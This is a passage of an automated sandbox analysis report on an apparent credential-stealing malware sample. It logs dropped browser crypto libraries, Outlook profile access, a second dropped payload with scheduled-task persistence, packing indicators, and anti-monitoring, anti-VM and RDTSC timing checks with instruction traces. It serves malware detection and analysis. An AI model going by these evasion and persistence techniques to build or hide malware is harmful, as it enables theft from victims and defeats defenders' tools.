Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 2544640 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22a000
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.4b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Unpacked PE file: 5.2.JJEGIJEGDB.exe.a10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 8.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 9.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ohmzqnep:EW;ebipawoj:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C65C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
Source: JJEGIJEGDB.exe.0.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x27638e
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1ce8ec should be: 0x1d2bc8
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: ohmzqnep
Source: amadka[1].exe.0.dr Static PE information: section name: ebipawoj
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .idata
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name:
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ohmzqnep
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ebipawoj
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: ohmzqnep
Source: explorti.exe.5.dr Static PE information: section name: ebipawoj
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B536 push ecx; ret 0_2_6C62B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001AD82C push ecx; ret 12_2_001AD83F
Source: file.exe Static PE information: section name: entropy: 7.995466725480933
Source: file.exe Static PE information: section name: entropy: 7.977842582826075
Source: file.exe Static PE information: section name: entropy: 7.9508605124369
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.987398323235003
Source: amadka[1].exe.0.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: entropy: 7.987398323235003
Source: JJEGIJEGDB.exe.0.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.987398323235003
Source: explorti.exe.5.dr Static PE information: section name: ohmzqnep entropy: 7.952574384600115
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6555F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C6555F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: A7EE45 second address: A7E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F34D94219DCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007F34D94219DEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007F34D94219E9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007F34D94219DCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007F34D94219DCh 0x00000061 lodsw 0x00000063 je 00007F34D94219DDh 0x00000069 jnc 00007F34D94219D7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007F34D94219E3h 0x00000089 push eax 0x0000008a jng 00007F34D94219E8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007F34D94219D6h 0x00000098 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB0F9 second address: BEB0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB639 second address: BEB646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007F34D94219D8h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB804 second address: BEB80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB933 second address: BEB93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEB93D second address: BEB941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEDF7F second address: BEE00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F34D94219DAh 0x00000010 jnp 00007F34D94219D6h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F34D94219D8h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007F34D94219E2h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007F34D94219D6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE106 second address: BEE10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE10A second address: BEE10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE10F second address: BEE11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE11F second address: BEE135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F34D94219DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE135 second address: BEE213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F34D8F44CC0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F34D8F44CC0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007F34D8F44CC0h 0x0000001f pop eax 0x00000020 call 00007F34D8F44CC5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007F34D8F44CB9h 0x00000046 movzx edx, cx 0x00000049 call 00007F34D8F44CB9h 0x0000004e push edi 0x0000004f jmp 00007F34D8F44CBEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007F34D8F44CBDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007F34D8F44CC2h 0x00000067 jp 00007F34D8F44CBCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007F34D8F44CC6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007F34D8F44CB6h 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE213 second address: BEE272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F34D94219D8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007F34D94219DDh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007F34D94219DCh 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE36C second address: BEE385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE385 second address: BEE38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE38F second address: BEE40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F34D8F44CC5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F34D8F44CB8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007F34D8F44CBFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007F34D8F44CB6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE40E second address: BEE443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BEE443 second address: BEE45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB38 second address: BDEB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F34D94219D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB42 second address: BDEB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB48 second address: BDEB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: BDEB50 second address: BDEB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
